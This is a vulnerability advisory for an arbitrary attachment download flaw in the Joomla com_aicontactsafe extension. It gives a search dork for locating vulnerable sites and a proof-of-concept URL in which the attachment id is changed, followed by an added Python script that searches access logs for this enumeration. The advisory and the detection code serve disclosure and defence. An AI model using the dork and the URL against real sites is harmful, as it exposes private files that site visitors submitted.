Joomla com_aicontactsafe Arbitrary Attachment Download - 08.06.2017


# Vulnerability: Joomla com_aicontactsafe Arbitrary Attachment Download
# Date: 08.06.2017
# Software link: http://www.algisinfo.com/en/download/category/1-free-extensions.html
# Dork: inurl:index.php?option=com_aicontactsafe
# Version: v.2.0.21c.stable
# Exploit Author: Dave
# Website: http://www.morawskiweb.pl
# Contact: dawidmorawski1990@gmail.com
#######################################

1. Description:
Anyone can download arbitrary attachments, as long as the website includes a field with attachments.

2. Proof of Concept:
localhost/index.php?option=com_aicontactsafe&sTask=message&task=download&id=1&format=raw

All you have to do is change the “id” value.
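To check whether a site has already been walked this way, the access log can be searched for clients that requested several different attachment ids through the download task. The following is an added detection example, not part of the original advisory; the log format (common/combined), the threshold of three ids and the sample lines are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Prefix of a common/combined access-log line: client, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges), not from a real server.
BASE = "/index.php?option=com_aicontactsafe&sTask=message&task=download"
SAMPLE_LOG = [
    f'203.0.113.7 - - [08/Jun/2017:10:00:01 +0000] "GET {BASE}&id=1&format=raw HTTP/1.1" 200 48211',
    f'203.0.113.7 - - [08/Jun/2017:10:00:02 +0000] "GET {BASE}&id=2&format=raw HTTP/1.1" 200 1093',
    f'203.0.113.7 - - [08/Jun/2017:10:00:03 +0000] "GET {BASE}&id=3&format=raw HTTP/1.1" 404 0',
    '198.51.100.20 - - [08/Jun/2017:10:05:00 +0000] "GET /index.php?option=com_aicontactsafe HTTP/1.1" 200 5120',
    f'198.51.100.20 - - [08/Jun/2017:10:05:09 +0000] "GET {BASE}&id=2&format=raw HTTP/1.1" 200 1093',
]

def download_id(target):
    """Return the id of a com_aicontactsafe attachment download request, else None."""
    query = parse_qs(urlsplit(target).query)
    first = lambda key: query.get(key, [""])[0]
    if first("option").lower() != "com_aicontactsafe":
        return None
    if first("task").lower() != "download":
        return None
    return first("id") or None

def find_enumeration(lines, min_ids=3):
    """Map client -> requested ids and ids answered with 200, for clients
    that asked for at least min_ids distinct attachments."""
    asked, served = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, target, status = m.groups()
        att_id = download_id(target)
        if att_id is None:
            continue
        asked[client].add(att_id)
        if status == "200":
            served[client].add(att_id)  # attachment was actually returned
    order = lambda ids: sorted(ids, key=lambda s: (len(s), s))
    return {c: {"ids": order(i), "served": order(served[c])}
            for c, i in asked.items() if len(i) >= min_ids}

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))
```

The `served` list shows which attachments were returned with status 200 and therefore need to be treated as disclosed.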

Written on June 8, 2017